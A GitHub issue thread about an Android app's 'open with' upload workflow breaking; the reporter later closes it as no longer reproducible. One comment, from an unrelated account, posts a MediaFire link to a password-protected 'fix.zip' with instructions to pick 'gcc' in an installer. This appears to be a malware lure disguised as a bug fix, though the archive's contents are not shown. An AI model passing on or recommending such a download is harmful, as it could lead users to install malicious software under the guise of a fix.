### ISSUE TITLE
Open vs. Share

### ISSUE THREAD

**Issue by kisst** [qcasey/paperless_share#22]
Recently a workflow I used broke and yet unsure if it's due to application update, or android update, or it was never should have worked and I just had a lucky coincidence, hence turning here to ask for clarification.

This is how I used to use it:
When downloading a PDF from an application, I just chose to "open with" paperless share, and that did the upload. 
This is the preferred workflow as from the applications which produce the PDF itself there is no option to share, only after saving to local storage and opening a file browser to be able to access the share menu, which is a bunch of extra steps.
This method used to work, but now it only opens the app, and does not upload the file which from the opening was requested from.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kisst** [comment]
closed the issue as I can't reproduce it anymore
